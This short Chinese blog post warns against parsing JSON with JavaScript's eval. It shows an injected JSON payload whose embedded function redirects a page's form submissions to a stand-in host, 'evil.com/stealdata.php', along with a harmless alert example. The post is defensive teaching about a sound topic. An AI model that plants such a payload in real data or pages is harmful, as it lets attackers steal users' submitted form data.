JSON数据的安全性,避免使用eval

JSON(javascript object notation)可以说是XML的替代品,也是一种数据格式,但JSON更加简单简洁。

我们时常会想把JSON的字符串形式转换成对象,而js提供的eval函数可以帮我们完成这个工作。

var testJson = “{"name": "test", "age": 30}”;

var jsonVal = eval(testJson);   //{"name": "test", "age": 30}

alert(jsonVal.age);  //30

这是因为eval是一个能够解析js代码的函数。所以如果有人恶意在JSON的数据中插入恶意代码,比如修改表单提交的地址。

[ 1, 2, (function(){                  
    document.forms[0].action = “http://evil.com/stealdata.php”;                   
})(), 3, 4]  

用eval解析JSON数据时,上面的函数会被执行。

[ 1, 2, (function(){                  

   alert("hacked!!!");
})(), 3, 4]  

用eval会输出hacked!!!。

这里只是举了一个简单的例子,只是想说,用eval函数来解析JSON数据存在很大的安全性问题,最好避免这么做。就算要这么做,那么在之前需要进行过滤!


评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值